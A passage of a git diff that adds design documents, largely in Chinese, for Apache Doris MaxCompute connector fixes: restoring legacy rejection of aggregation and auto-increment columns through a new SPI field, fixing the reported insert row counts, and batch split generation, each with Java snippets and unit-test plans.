/ thrift。守门 `-pl :fe-core -am` + checkstyle。 + +## Risk +- 回归极低:仅 `connectorTx != null` 分支新增一次无副作用累加器读取赋值;`connectorTx == null` 的 JDBC/ES 路径字节不变。 +- `getUpdateCnt()` 时点:doBeforeCommit 在 commit 前、BE 回传 commitData 之后调用(与 legacy 同一生命周期位点,legacy 在此读 getUpdateCnt 成功)→ commitDataList 已填,值正确。 +- follower/replay:`loadedRows` 是会话级返回值,非 editlog 持久化字段,无 replay 影响。 +- 推翻历史:`P4-T05-T06-cutover-design.md:114` 的 "correctly skipped" 结论(只覆盖"能否写成功",漏"写成功后报告行数")——deviations/decisions-log 待 doc-sync 补更正(prior-session WIP,本 commit 不混入)。 + +## Test Plan(UT,fe-core,Rule 9 mutation 自证) +扩 `PluginDrivenInsertExecutorTest`(已有 CALLS_REAL_METHODS + Deencapsulation 构造基建): +- `doBeforeCommitBackfillsLoadedRowsFromConnectorTxnInTransactionModel`: 注 `connectorTx`(stub getUpdateCnt=42),调 doBeforeCommit,断言 `loadedRows==42`。mutation: `loadedRows=0L` → 红(expected 42 was 0)。 +- `doBeforeCommitUsesHandleModelAndSkipsTxnBackfillWhenNoConnectorTxn`: handle 模型(connectorTx=null,注 writeOps recording + insertHandle),调 doBeforeCommit,断言 finishInsert 被调 + `loadedRows==0`(无 connectorTx 不回填、不 NPE)。mutation: 删 `connectorTx != null` 守卫 → 红(NPE)。 +- E2E(live ODPS,user-run):事务模型 INSERT 后断言 `affected rows` == 实际写入行数(非 0)。CI 守门仅 UT。 + +## 成功标准 +编译过 + Checkstyle=0 + 新 UT 绿且 mutation 自证 + 对抗 review 收敛。 + +## Review 轮次(1 轮收敛) +**verdict `sound`**(workflow `wi7zu5h45`,3 lens)。4 raw findings 经 Phase B 全未存活(confirms 0/0/0/1)。最接近的 F4(测 loadedRows 字段未测其流到 affected-rows 表面)未达 2 票——表面化是 `BaseExternalTableInsertExecutor` 既有 wiring,e2e 覆盖。production code 三 lens 一致 clean。mutation: `loadedRows=0L`→test1 红;删守卫→test2 红(NPE)。UT 6/6、CS=0。详见 `plan-doc/reviews/P4-T06d-FIX-WRITE-ROWS-review-rounds.md`。 diff --git a/plan-doc/tasks/designs/P4-T06e-FIX-AGG-COLUMN-REJECT-design.md b/plan-doc/tasks/designs/P4-T06e-FIX-AGG-COLUMN-REJECT-design.md new file mode 100644 index 00000000000000..4324e77a489f45 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06e-FIX-AGG-COLUMN-REJECT-design.md @@ -0,0 +1,119 @@ +# [P4-T06e] FIX-AGG-COLUMN-REJECT (GAP5) — design + +> 来源:Batch-D 红线扩充对抗复审 workflow `wbw4xszrg`(GAP5,Tier 2,minor)。**证伪 P2-8「非-OLAP 路径已覆盖聚合列」**。 +> 用户定夺(2026-06-08):**Option B — 加 SPI 字段 `isAggregated`**(逐字镜像 P2-8 FIX-AUTOINC-REJECT 的 `isAutoInc`,见 [[catalog-spi-p2-ddl-decisions]])。 +> 关联:legacy 对照 `MaxComputeMetadataOps.validateColumns:426-429`(`if (col.isAggregated())` 抛,**紧邻**已镜像的 auto-inc 分支 :422-425);`Column.isAggregated():553-555` = `aggregationType != null && != AggregateType.NONE`。 + +## Problem + +翻闸后 `CREATE TABLE (c INT SUM) ENGINE=... ` 对 max_compute(external、非-OLAP)表**静默建普通列**——聚合列(SUM/REPLACE/MAX…)对非-OLAP 外表非法,legacy 显式拒绝,新路丢失该拒绝、悄悄把 `c` 建成无聚合的普通列(数据模型回归,用户意图无声蒸发)。 + +两使能条件(与 P2-8 auto-inc **同构**): +1. **nereids 上游不拒非-OLAP 的 bare 聚合列**。唯一 nereids 闸 `ColumnDefinition.validate(isOlap,...)`(`:358-385`)只校验 key+aggType 冲突 / 类型兼容 / GENERIC 需 enable_agg_state;真正拒「非-key 列带 aggType」的 `validateKeyColumns()`(`:1068-1089`)**仅在 `CreateTableInfo.validate()` 的 `ENGINE_OLAP` 块内被调**(`:645`)→ 非-OLAP 外表不可达。`isOlap==false` 时 `validate` 的隐式 aggType 赋值块(`:374-385`)亦被 gate 跳过,故用户写的 aggType 原样留存、无人拒。 +2. **SPI 载体无法表示聚合**。`ConnectorColumn` 无 aggType/isAggregated 字段(仅 P2-8 加的 isAutoInc)→ 即便连接器想拒也看不到。 + +## Root Cause(已核码确认,branch catalog-spi-05) + +| 层 | 位置 | 现状 | +|---|---|---| +| SPI 载体丢标志 | `ConnectorColumn`(`fe-connector-api/.../ConnectorColumn.java:25-111`)| 7 字段 `name,type,comment,nullable,defaultValue,isKey,isAutoInc`(:27-33)。**无 isAggregated**。ctor 链 5→6→7-arg(:35-54)。 | +| 转换器丢标志 | `CreateTableInfoToConnectorRequestConverter.convertColumns:90-92` | 用 7-arg ctor 传 `name,type,comment,nullable,null,isKey, getAutoIncInitValue()!=-1`——**从不读 getAggType()**。 | +| 连接器看不到 | `MaxComputeConnectorMetadata.validateColumns:476-498`(`createTable` 内 tableExist 短路后调)| 仅查 empty/null(:477-480)、isAutoInc(:486-490,P2-8)、dup name(:491-494)、可表示类型(:496)。**无 aggregated 查**(标志从未被载)。 | + +净:聚合列抵达连接器但不可见 → 静默丢弃。 + +## Parity Reference(被镜像的 legacy 代码) + +legacy `MaxComputeMetadataOps.validateColumns`(`fe-core/.../maxcompute/MaxComputeMetadataOps.java:416-437`),聚合半在 **:426-429**(与 auto-inc :422-425 **相邻**): + +```java +for (Column col : columns) { + if (col.isAutoInc()) { throw ...; } // :422-425 ← P2-8 已镜像 + if (col.isAggregated()) { // :426 ← 本 fix 镜像 + throw new UserException( + "Aggregation columns are not supported for MaxCompute tables: " + col.getName()); // :427-428 + } + ... +} +``` + +`Column.isAggregated()`(`fe-catalog/.../Column.java:553-555`)= `aggregationType != null && aggregationType != AggregateType.NONE`——本 fix 在转换器侧用 `ColumnDefinition.getAggType()` 复现此布尔。 + +## Design(用户定 Option B:加 SPI 字段,逐字镜像 P2-8) + +**WHY Option B over Option A(FE-core guard)**(用户定夺,2026-06-08): +- **一致性 / 完整镜像**:聚合拒绝是 legacy `validateColumns` 中 auto-inc 拒绝的**下一行**;连接器 `validateColumns` 已含 `if (col.isAutoInc())`,本 fix 在其后加 `if (col.isAggregated())` = 完成同一方法的 legacy 镜像。P2-8 设计明文将聚合分支记为「out of scope... 仅做 auto-inc」,本 fix 即其遗留续作。 +- **同层 parity**:在连接器 `validateColumns` 拒绝 = legacy 同层(非 nereids 早拒);CTAS + 显式列路径统一覆盖(两路径都过 `createTable→validateColumns`)。 +- **additive、零破坏**:8-arg ctor + default `isAggregated=false`,全部既有 call site(5/6/7-arg)原样编译、保持 false(P2-8 同款 pattern,已验 16 文件)。 + +### 1. SPI `ConnectorColumn`(additive 第 8 字段) + +- 加字段 `private final boolean isAggregated;`(isAutoInc 后)。 +- 现 7-arg ctor 改为**委托** 8-arg、`isAggregated=false`(保 7-arg 调用方=转换器旧行为,但转换器本 fix 即改 8-arg)。 +- 加 8-arg ctor(唯一全赋值)。 +- 加 getter `isAggregated()`。 +- `equals` 加 `&& isAggregated == that.isAggregated`;`hashCode` 加 `isAggregated`。 +- `toString` 不动(聚合非既有文本契约,Rule 3)。 + +### 2. 转换器 `CreateTableInfoToConnectorRequestConverter.convertColumns` + +加 `import org.apache.doris.catalog.AggregateType;`;在循环内算布尔(镜像 `Column.isAggregated()`)并传第 8 arg: +```java +boolean isAggregated = d.getAggType() != null && d.getAggType() != AggregateType.NONE; +out.add(new ConnectorColumn( + d.getName(), type, d.getComment(), + d.isNullable(), null, d.isKey(), d.getAutoIncInitValue() != -1, isAggregated)); +``` + +### 3. 连接器 `MaxComputeConnectorMetadata.validateColumns` + +在 `if (col.isAutoInc())` 块**后**加(镜像 legacy 相邻分支): +```java +// MaxCompute has no aggregate-key model; reject aggregate columns (SUM/REPLACE/...), +// mirroring legacy MaxComputeMetadataOps.validateColumns:426-429. The nereids non-OLAP path +// does not reject these (validateKeyColumns is ENGINE_OLAP-gated), so without this the user's +// aggregate intent is silently dropped to a plain column. +if (col.isAggregated()) { + throw new DorisConnectorException( + "Aggregation columns are not supported for MaxCompute tables: " + col.getName()); +} +``` + +## Blast Radius + +8-arg ctor additive(default `isAggregated=false`)→ 全 25 处 `new ConnectorColumn(` call site(16 文件):唯一改动 = 转换器(7→8-arg);其余 5/6-arg 经委托链保持 isAggregated=false(es/jdbc/hive/hudi/iceberg/paimon/trino/hms + MC 读路径 data/part 列 + fe-core PluginDrivenExternalTable/PhysicalPlanTranslator/ConnectorColumnConverter + 各 test)字节不变。无 SPI 方法签名变更(仅加 ctor 重载)。import-gate 净(isAggregated 在 fe-connector-api;getAggType()/AggregateType 在 fe-core 转换器,已可见)。equals/hashCode 加字段是正确不变式(两列仅 isAggregated 异即不同)。 + +**rebuild**:SPI 模块(fe-connector-api)变 → 须 rebuild api + maxcompute + fe-core。 + +## Risk Analysis + +| Risk | Mitigation | +|---|---| +| 合法非聚合列被误拒 | 闸 = `getAggType() != null && != NONE`,逐字镜像 `Column.isAggregated()`;converter 测钉普通列 → isAggregated=false。 | +| 其余 6 连接器行为漂移 | additive default false(25 call site 全验);其 producer 从不设聚合、validateColumns(若有)不读它。 | +| equals/hashCode 改动破坏 set/map | 加字段为正确不变式;无生产代码跨 isAggregated 边界 key 集合(全 producer default false)。 | +| 现有 converter 测因 mock 未 stub getAggType 而 NPE/变红 | Mockito mock 未 stub 的 getAggType() 返 null → isAggregated=false(不抛、不改既有断言);real ColumnDefinition 测列 aggType=null/NONE → false。 | +| CTAS 路径 | 连接器 validateColumns 对 CTAS+显式列统一覆盖(两路径都过 createTable)。 | + +## Test Plan + +钉 **WHY**(Rule 9):MaxCompute 无聚合-key 模型;legacy 显式拒(`:426-429`)。静默接受 = 用户聚合意图无声丢弃(数据模型回归)。 + +### A. SPI equals/hashCode — `fe-connector-api`(扩 `ConnectorColumnTest`) +- `equalsAndHashCodeDistinguishAggregated`:两列仅 isAggregated 异(8-arg `...false,false,false` vs `...false,false,true`)→ `assertNotEquals` + hashCode 异。MUTATION:删 `&& isAggregated == that.isAggregated` → 红。 +- `defaultCtorsLeaveAggregatedFalse`:5/6/7-arg ctor → isAggregated=false(锁 additive-default 契约)。 + +### B. 转换器 passthrough — `fe-core`(扩 `CreateTableInfoToConnectorRequestConverterTest`) +- `aggTypePropagatedAsIsAggregated`:mock ColumnDefinition `getAggType()→AggregateType.SUM`、`getAutoIncInitValue()→-1L` → convert → `isAggregated()==true`。MUTATION:转换器丢第 8 arg / 布尔改常量 false → 红。 +- `plainColumnIsNotAggregated`:`getAggType()→null`(或 NONE)→ `isAggregated()==false`(守 boundary)。 + +### C. 连接器拒绝 — `fe-connector-maxcompute`(扩 `MaxComputeValidateColumnsTest`) +- `aggregatedColumnIsRejected`:`new ConnectorColumn("c", INT, "", false, null, false, false, true)` → `validateColumns` 抛 `DorisConnectorException`,msg 含 `"Aggregation columns are not supported for MaxCompute tables: c"`。MUTATION:删 `if (col.isAggregated()) throw` → 红。 +- `nonAggregatedColumnPasses`:isAggregated=false → 不抛(守 over-rejection)。 + +### E2E(CI 跳) +纯 FE 校验、抛在任何 ODPS RPC 前 → 无需 live ODPS(同 P2-8)。可选 regression 用例:`CREATE TABLE (c INT SUM)` 对 mc 表报含「Aggregation columns are not supported」。 + +## 决策类型 + +明确修复(用户定 Fix Option B,Tier 2 minor)。加 SPI 字段 `isAggregated`、逐字镜像 P2-8 isAutoInc + legacy `MaxComputeMetadataOps.validateColumns:426-429`。证伪 P2-8「非-OLAP 已覆盖聚合列」假设(doc-sync:更正 P2-8 design「out of scope,已覆盖」措辞)。 diff --git a/plan-doc/tasks/designs/P4-T06e-FIX-AUTOINC-REJECT-design.md b/plan-doc/tasks/designs/P4-T06e-FIX-AUTOINC-REJECT-design.md new file mode 100644 index 00000000000000..4078e838ce7dbe --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06e-FIX-AUTOINC-REJECT-design.md @@ -0,0 +1,319 @@ +# FIX-AUTOINC-REJECT (P4-T06e) — design + +> 8th cutover-fix (DDL/列校验). Scope: fe-connector-api (SPI additive field) + fe-core (converter) +> + fe-connector-maxcompute (validation). Additive SPI field, zero-break for the other 6 +> connectors. Surgical (Rule 3). +> Source: clean-room re-review DG-5 / F24 (`plan-doc/reviews/P4-maxcompute-full-rereview-2026-06-07.md`, +> §DG-5 / §C domain-3 / §D F24). Minor regression. UT-only truth-gate (no live ODPS needed: the +> rejection is pure FE-side validation, never reaches ODPS). +> User decision (honored): **ADD SPI FIELD (full parity), NOT a deviation.** + +## Problem + +Legacy MaxCompute `CREATE TABLE` explicitly rejected `AUTO_INCREMENT` columns with a clear +error. After the SPI cutover, `CREATE TABLE ... (id INT AUTO_INCREMENT, ...) ENGINE=...` against a +MaxCompute catalog **silently succeeds, dropping the auto-inc semantics** — a data-model +regression. The user expects the column to behave as auto-increment; MaxCompute cannot store it, +and the table is created anyway with `id` as a plain column. No error, no warning. + +Two enabling conditions make the bug live: + +1. **Nereids upstream does NOT reject auto-inc for external (non-OLAP) tables.** The historical + claim in `P4-maxcompute-migration.md:117` ("nereids upstream already rejects") is FALSE for + auto-inc. `ColumnDefinition.validate(boolean isOlap, ...)` is the only nereids gate, and its + sole auto-inc check is line 666-667 — and that fires **only for generated columns** + (`generatedColumnDesc.isPresent()`), not plain auto-inc columns. There is no `isOlap==false` + path that rejects a bare auto-inc column. So an auto-inc column flows cleanly through nereids + analysis into the connector create-table request. +2. **The SPI carrier cannot represent auto-inc.** `ConnectorColumn` has no `isAutoInc` field, so + even if the connector wanted to reject it, the flag is invisible by the time it reaches + `validateColumns`. + +## Root Cause (confirmed file:line — cutover vs legacy) + +Verified against the actual code on branch `catalog-spi-05`: + +- **SPI carrier drops the flag.** `ConnectorColumn` + (`fe/fe-connector/fe-connector-api/.../ConnectorColumn.java:25-99`) has exactly 6 fields: + `name, type, comment, nullable, defaultValue, isKey` (lines 27-32). No `isAutoInc`. Two ctors: + 5-arg (`:34-37`, delegates to 6-arg with `isKey=false`) and 6-arg (`:39-47`). `equals`/`hashCode` + (`:73-93`) cover only those 6 fields. +- **Converter drops the flag.** `CreateTableInfoToConnectorRequestConverter.convertColumns` + (`fe/fe-core/.../connector/ddl/CreateTableInfoToConnectorRequestConverter.java:83-93`) builds + each `ConnectorColumn` from a `ColumnDefinition` passing `d.getName(), type, d.getComment(), + d.isNullable(), null, d.isKey()` — it reads `isKey()` but never reads `getAutoIncInitValue()`. + A column is auto-inc when `getAutoIncInitValue() != -1` (default `-1`, field decl + `ColumnDefinition.java:69`; getter `:651-652`; the `!= -1` semantics are also how `toSql` decides + to emit `AUTO_INCREMENT`, `:225-230`). +- **Connector validation cannot see it.** `MaxComputeConnectorMetadata.validateColumns` + (`fe/fe-connector/fe-connector-maxcompute/.../MaxComputeConnectorMetadata.java:424-438`, called + from `createTable` at `:348` after the `tableExist` short-circuit) checks only: empty/null + (`:425-428`), duplicate name (`:431-433`), and representable type (`:436`, via + `MCTypeMapping.toMcType`). There is no auto-inc check because the flag was never carried. + +Net: auto-inc reaches the connector but is invisible there, so it is silently dropped. + +## Parity Reference (exact legacy code being mirrored) + +Legacy `MaxComputeMetadataOps.validateColumns` +(`fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeMetadataOps.java:416-437`), +the auto-inc half is lines **422-425** (verified verbatim): + +```java +private void validateColumns(List columns) throws UserException { + if (columns == null || columns.isEmpty()) { + throw new UserException("Table must have at least one column."); + } + Set columnNames = new HashSet<>(); + for (Column col : columns) { + if (col.isAutoInc()) { // :422 + throw new UserException( // :423 + "Auto-increment columns are not supported for MaxCompute tables: " + col.getName()); // :424 + } // :425 + if (col.isAggregated()) { ... } // :426-429 OUT OF SCOPE (F31) + ... + } +} +``` + +We mirror the auto-inc branch (`:422-425`) exactly, including the error message text. + +**Out of scope (do NOT add):** the aggregation-column branch (`:426-429`). Per report F31 it is +already covered by the non-OLAP key-column path; this fix touches auto-inc only. + +## Design (chosen approach + WHY) + +**User-chosen direction (honored): add an `isAutoInc` field to the SPI `ConnectorColumn`** and +thread it end-to-end (converter → connector validation), restoring full legacy parity rather than +registering a deviation. + +WHY this over the alternatives: +- It is the only approach that gives **full parity**: the connector re-rejects auto-inc with the + same message legacy used, instead of accepting-and-documenting (a deviation the user explicitly + declined). +- It follows the **established additive-SPI pattern** in this codebase (P0-1/2/3 capabilities, the + P1-4 6-arg `planScan` overload, and the very `isKey` field that was itself added as a 6-arg + overload over a 5-arg base): add a NEW ctor overload + field with a `default` that makes the + prior arity delegate with the safe default (`isAutoInc=false`). All existing `new + ConnectorColumn(` call sites keep compiling and keep `isAutoInc=false`, so the 7 other connectors + (es/jdbc/hive/hudi/iceberg/paimon/trino) and all read-path producers are zero-break. +- It is minimal (Rule 2): one field + one ctor + one getter + equals/hashCode update in the SPI, + one arg in the converter, one `if` in the connector. Nothing speculative; no SPI method-signature + change (only an additive ctor). + +The `defaultValue`-carrier gap noted in the converter comment (`:87-89`) is unrelated and stays +untouched (Rule 3). + +## Implementation Plan (ordered, file-by-file) + +### 1. `fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorColumn.java` (SPI, additive) + +- Add field after `isKey` (`:32`): `private final boolean isAutoInc;` +- Keep the 5-arg ctor (`:34-37`) unchanged (still delegates to the 6-arg). +- Change the existing **6-arg** ctor (`:39-47`) so it **delegates** to the new 7-arg with + `isAutoInc=false` (preserves existing behavior for the 6-arg call sites — EsTypeMapping:185 + isKey=true, converter:90): + ```java + public ConnectorColumn(String name, ConnectorType type, String comment, + boolean nullable, String defaultValue, boolean isKey) { + this(name, type, comment, nullable, defaultValue, isKey, false); + } + ``` +- Add the new **7-arg** ctor (the only one that assigns all fields): + ```java + public ConnectorColumn(String name, ConnectorType type, String comment, + boolean nullable, String defaultValue, boolean isKey, boolean isAutoInc) { + this.name = Objects.requireNonNull(name, "name"); + this.type = Objects.requireNonNull(type, "type"); + this.comment = comment; + this.nullable = nullable; + this.defaultValue = defaultValue; + this.isKey = isKey; + this.isAutoInc = isAutoInc; + } + ``` + (The 5-arg ctor continues to call the 6-arg, which now reaches the 7-arg with `isAutoInc=false`.) +- Add getter after `isKey()` (`:69-71`): `public boolean isAutoInc() { return isAutoInc; }` +- Update `equals` (`:81-88`): add `&& isAutoInc == that.isAutoInc`. +- Update `hashCode` (`:90-93`): add `isAutoInc` to `Objects.hash(...)`. +- `toString` (`:95-98`): leave unchanged (optional per issue; auto-inc not part of the existing + textual contract — Rule 3, no speculative change). + +### 2. `fe/fe-core/src/main/java/org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverter.java` (passthrough) + +- In `convertColumns` (`:90-92`), pass the auto-inc flag as the new 7th arg: + ```java + out.add(new ConnectorColumn( + d.getName(), type, d.getComment(), + d.isNullable(), null, d.isKey(), d.getAutoIncInitValue() != -1)); + ``` + No new imports needed (`ColumnDefinition` already imported, `getAutoIncInitValue()` is on it). + +### 3. `fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadata.java` (validation, parity) + +- In `validateColumns` (`:430-437` loop body), add the auto-inc check FIRST inside the loop, + mirroring legacy ordering (`:422-425`): + ```java + for (ConnectorColumn col : columns) { + if (col.isAutoInc()) { + throw new DorisConnectorException( + "Auto-increment columns are not supported for MaxCompute tables: " + col.getName()); + } + if (!seen.add(col.getName().toLowerCase())) { + ... + ``` + `DorisConnectorException` is already imported (`:25`). No other change. +- **Make `validateColumns` package-private** (drop `private` at `:424`) so the connector unit test + can invoke it directly. Reason: `validateColumns` is only reachable via `createTable`, which + first calls `structureHelper.tableExist(odps, ...)` (`:337`) — that needs a live ODPS handle, and + the maxcompute test module has **no Mockito and no fe-core** (pom has only `junit-jupiter`), so + the structureHelper cannot be stubbed. Package-private + a brief comment matches the existing + `MaxComputeBuildTableDescriptorTest` pattern (construct metadata with `null` odps/structureHelper + and call a method that never dereferences them; `validateColumns` only uses the static + `MCTypeMapping.toMcType`, so null fields are safe). Add a one-line comment: + `// package-private for unit test; reached only via createTable() in production.` + +## Blast Radius + +**SPI ctor is additive (default `isAutoInc=false`) — prove zero-break for all callers.** + +All 12 production `new ConnectorColumn(` call sites + 1 test fixture, enumerated and verified by +grep over `fe/`: + +| # | call site | arity used | after change | +|---|---|---|---| +| 1 | `EsTypeMapping.java:131` | 5-arg | compiles; `isAutoInc=false` (via 5→6→7 delegation) | +| 2 | `EsTypeMapping.java:185` | **6-arg, isKey=true** | compiles; `isKey=true` preserved, `isAutoInc=false` | +| 3 | `HiveConnectorMetadata.java:253` | 5-arg | unchanged, false | +| 4 | `ThriftHmsClient.java:303` (hms) | 5-arg | unchanged, false | +| 5 | `HudiConnectorMetadata.java:279` | 5-arg | unchanged, false | +| 6 | `IcebergConnectorMetadata.java:157` | 5-arg | unchanged, false | +| 7 | `JdbcConnectorMetadata.java:130` | 5-arg | unchanged, false | +| 8 | `JdbcConnectorMetadata.java:270` | 5-arg | unchanged, false | +| 9 | `MaxComputeConnectorMetadata.java:138` (data cols, read) | 5-arg | unchanged, false | +| 10 | `MaxComputeConnectorMetadata.java:150` (part cols, read) | 5-arg | unchanged, false | +| 11 | `PaimonConnectorMetadata.java:190` | 5-arg | unchanged, false | +| 12 | `TrinoConnectorDorisMetadata.java:186` | 5-arg | unchanged, false | +| 13 | `CreateTableInfoToConnectorRequestConverter.java:90` (fe-core) | 6→**7-arg** | **CHANGED** (this fix) | +| 14 | `ConnectorColumnConverter.java:78` (fe-core) | 6-arg (passes `cc.isKey()`) | compiles; false | +| 15 | `PluginDrivenExternalTable.java:139` (fe-core) | 6-arg | compiles; false | +| 16 | `PhysicalPlanTranslator.java:663` (fe-core) | 6-arg | compiles; false | +| 17 | `PluginDrivenExternalTablePartitionTest.java:171-173,207` (fe-core test) | 5-arg | compiles; false | + +- **Only call site #13 changes.** Every other call site keeps its arity; the additive default + `false` means each produced `ConnectorColumn` is byte-for-byte equivalent in behavior to before + (auto-inc was always implicitly false). #2 (es, isKey=true via 6-arg) still routes through the + delegating 6-arg ctor and keeps isKey=true. +- **No SPI method-signature change.** `ConnectorMetadata` and all interface methods are untouched; + only a new ctor overload is added. No overrider in any connector needs updating. +- **No existing test assertions break.** `PluginDrivenExternalTablePartitionTest:171-207` uses the + 5-arg ctor and asserts on partition pruning, not on auto-inc — unaffected. + `CreateTableInfoToConnectorRequestConverterTest` asserts name/nullable/comment/partition/bucket, + none of which change for its fixtures (all use non-auto-inc `ColumnDefinition`s, so + `isAutoInc==false`) — unaffected. +- **fe-connector-api consumers rebuilt:** since the SPI module (`fe-connector-api`) changes, the + build must rebuild api + maxcompute + fe-core (operational note). No es/jdbc/hive/hudi/iceberg/ + paimon/trino source edits. +- **Import-gate:** no connector module gains an fe-core import (the new field lives in + fe-connector-api; the converter that reads `getAutoIncInitValue()` is already in fe-core). The + maxcompute change uses only already-imported symbols. `bash tools/check-connector-imports.sh` + stays green. + +## Risk Analysis + +- **Risk: a legitimate non-auto-inc CREATE TABLE wrongly rejected.** Mitigated: the gate is + `getAutoIncInitValue() != -1`, the exact same predicate `toSql` (`:225`) uses to emit + `AUTO_INCREMENT`; default is `-1`. The converter test asserts a normal column yields + `isAutoInc()==false`. +- **Risk: behavior drift for the other 6 connectors.** Eliminated by additive default `false` — + proven above; their producers never set auto-inc, and their `validateColumns` (if any) do not + read it. +- **Risk: package-private `validateColumns` widens API surface.** Minimal: it stays package-private + (not public), is documented as test-only, and the method is pure FE-side validation. Matches the + module's existing offline-test idiom. +- **Risk: equals/hashCode change breaks a set/map keyed on ConnectorColumn.** Low: adding a field + to equals/hashCode is the correct invariant (two columns differing only in auto-inc ARE + different). No production code keys collections on `ConnectorColumn` identity across the auto-inc + boundary (all producers default false, so existing keys are unchanged in value). +- **Risk: aggregation half (F31) erroneously added.** Explicitly excluded per issue and report; + only the auto-inc branch is mirrored. +- **Truth-gate:** UT is sufficient here — the rejection is pure FE validation that throws before + any ODPS RPC, so no live ODPS e2e is required (unlike the write-path blockers). + +## Test Plan + +### Unit Tests + +#### A. Connector validation — `fe-connector-maxcompute` + +- **File:** `fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeValidateColumnsTest.java` (new) +- **Class:** `MaxComputeValidateColumnsTest` +- **Setup:** construct `new MaxComputeConnectorMetadata(null, null, "proj", "ep", "quota", emptyMap)` + (same offline idiom as `MaxComputeBuildTableDescriptorTest`); call the now package-private + `validateColumns(List)` directly. +- **Tests:** + - `autoIncColumnIsRejected` — list = `[new ConnectorColumn("id", ConnectorType.of("INT"), "", + false, null, false, true)]` → assert `DorisConnectorException` thrown AND message contains + `"Auto-increment columns are not supported for MaxCompute tables: id"`. + **WHY (Rule 9):** MaxCompute physically cannot store auto-increment; legacy rejected it loudly + (`MaxComputeMetadataOps:422-425`). Silent acceptance is a data-model regression — the user's + auto-inc intent is dropped without warning. This test fails if the connector ever stops + rejecting auto-inc. + - `nonAutoIncColumnPasses` — list = `[new ConnectorColumn("id", ConnectorType.of("INT"), "", + false, null, false, false)]` → assert `validateColumns` returns without throwing. + **WHY:** guards against over-rejection — a normal column must still create successfully; the + gate must key on the flag, not reject all columns. +- **MUTATION:** removing the `if (col.isAutoInc()) throw ...` block in + `MaxComputeConnectorMetadata.validateColumns` makes `autoIncColumnIsRejected` go red (no + exception). This is the one-line production revert that re-introduces the regression. + +#### B. Converter passthrough — `fe-core` + +- **File:** `fe/fe-core/src/test/java/org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverterTest.java` (existing — add tests) +- **Class:** `CreateTableInfoToConnectorRequestConverterTest` +- **Tests:** + - `autoIncInitValueIsPropagatedAsIsAutoInc` — build a `ColumnDefinition` with + `autoIncInitValue != -1` using the public 10-arg ctor + (`new ColumnDefinition("id", IntegerType.INSTANCE, false, null, ColumnNullableType.NOT_NULLABLE, + 1L /*autoIncInitValue*/, Optional.empty(), Optional.empty(), "", Optional.empty())`), run + `convert(...)`, assert `req.getColumns().get(0).isAutoInc() == true`. + **WHY (Rule 9):** the connector can only reject what the converter carries. This proves the + flag survives the `ColumnDefinition → ConnectorColumn` boundary, i.e. the converter does not + re-drop it. Without passthrough, the connector gate (Test A) is dead code. + - `plainColumnIsNotAutoInc` — existing-style `ColumnDefinition` (default `autoIncInitValue == -1`) + → assert `isAutoInc() == false`. + **WHY:** guards the `!= -1` predicate boundary — a normal column must map to false, not true + (catches an inverted/constant-true mistake). +- **MUTATION:** reverting the converter to the 6-arg ctor (dropping the 7th arg, i.e. not passing + `d.getAutoIncInitValue() != -1`) makes `autoIncInitValueIsPropagatedAsIsAutoInc` go red + (`isAutoInc()` would be false). + +#### C. SPI equals/hashCode — `fe-connector-api` + +- **File:** `fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/ConnectorColumnTest.java` (new) +- **Class:** `ConnectorColumnTest` +- **Tests:** + - `equalsAndHashCodeDistinguishAutoInc` — two columns identical except + `isAutoInc` (`...false, false` vs `...false, true`) → assert `!a.equals(b)` and (best-effort) + `a.hashCode() != b.hashCode()`. + **WHY (Rule 9):** auto-inc is now a semantic discriminator; two columns differing only by it are + genuinely different. If equals/hashCode ignored the field, collections deduping + `ConnectorColumn`s could collapse an auto-inc column onto a plain one, silently re-dropping the + flag downstream. + - `defaultCtorsLeaveAutoIncFalse` — `new ConnectorColumn("c", ConnectorType.of("INT"), "", true, + null)` (5-arg) and the 6-arg form both report `isAutoInc() == false`. + **WHY:** locks the additive-default contract — proves the 7 other connectors and read-path + producers (which use 5/6-arg) keep `isAutoInc=false`, i.e. zero behavior change. +- **MUTATION:** removing `&& isAutoInc == that.isAutoInc` from `equals` makes + `equalsAndHashCodeDistinguishAutoInc` go red. + +### E2E Tests + +- No live ODPS e2e required for this fix: the rejection is pure FE-side validation that throws + before any ODPS RPC. CI is UT-only anyway and skips live ODPS. +- Optional regression-test coverage (CI-skip, for the standing live truth-gate documentation): + `regression-test/suites/external_table_p2/maxcompute/test_mc_create_table.groovy` (or the + existing MC DDL suite if present) could add a case asserting + `CREATE TABLE ... (id INT AUTO_INCREMENT) ...` raises an error containing "Auto-increment columns + are not supported for MaxCompute tables". Note: skipped in CI; runs only against a real ODPS + project. diff --git a/plan-doc/tasks/designs/P4-T06e-FIX-BATCH-MODE-SPLIT-design.md b/plan-doc/tasks/designs/P4-T06e-FIX-BATCH-MODE-SPLIT-design.md new file mode 100644 index 00000000000000..d88c31ee37ac16 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06e-FIX-BATCH-MODE-SPLIT-design.md @@ -0,0 +1,274 @@ +# FIX-BATCH-MODE-SPLIT 设计(P3-11 / NG-7 / F6=F13) + +> 严重度:🟡 minor(性能/内存,行正确)。**用户拍板(2026-06-08):实现 batch SPI 路径(非 DV)、design-first(本文档供评审、过目后再进实现)。** +> 来源:`plan-doc/reviews/P4-maxcompute-full-rereview-2026-06-07.md` §A NG-7。 +> recon:workflow `wiczf63pp`(5 agent,A legacy 机器 / B 消费侧契约 / C SPI 面 / D 通用节点闸门 / E Batch-D 红线)。 +> **状态:✅ DONE @`ac8f0fc15eb`**(设计验证 `wcpg9lblj` + impl-review `wve7y1jst` 各 GO-WITH-EDITS 折入;[D-035]/[DV-019])。账本回填见下一 doc-sync commit。 + +--- + +## Problem + +翻闸后 `PluginDrivenScanNode` 不 override `isBatchMode/numApproximateSplits/startSplit`,继承 `SplitGenerator` +默认(`isBatchMode()=false`、`numApproximateSplits()=-1`、`startSplit()=no-op`),故 plugin-driven(含 MaxCompute) +读路径**永远走同步 `getSplits()`**:一次性同步枚举**全部已裁剪分区**的所有 split。legacy 